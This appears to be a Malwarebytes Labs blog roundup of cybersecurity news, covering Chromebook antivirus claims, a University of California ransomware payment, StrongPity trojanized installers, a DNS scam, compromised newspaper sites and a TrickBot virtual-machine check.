• The Chromebook, they say, is a system that doesn’t need antivirus protection. Or does it? We took a deep dive into this claim to see if it truly holds water.

Plus other cybersecurity news:

• Another ransomware attack struck a school, this time the University of California, who admitted to paying the ransom to the tune of 1.4 USD. (Source: Computer Business Review)
• A known APT threat actor called Promethium, aka StrongPity, was spotted by multiple security researchers pushing Trojanized installers that mimic legitimate programs to target countries, which include India and Canada, for intelligence gathering. (Source: ZDNet)
• Website owner and bloggers, beware! There’s a “secure DNS” scam making rounds, purporting to “help” you. (Source: Sophos’s Naked Security Blog)
• Attackers compromised several US newspaper websites, and then used them as launchpads to distribute code that allows for the downloading of ransomware to visitors, of which are mostly huge organizations. (Source: Dark Reading)
• TrickBot, a nefarious and very tricky Trojan, has a new quirk: it checks for the screen resolution spec of victim machine to identify if it is running on a virtual machine or not. (Source: BleepingComputer)

Stay safe, everyone!

The post Lock and Code S1Ep10: Pulling apart the Internet of Things with JP Taggart appeared first on Malwarebytes Labs.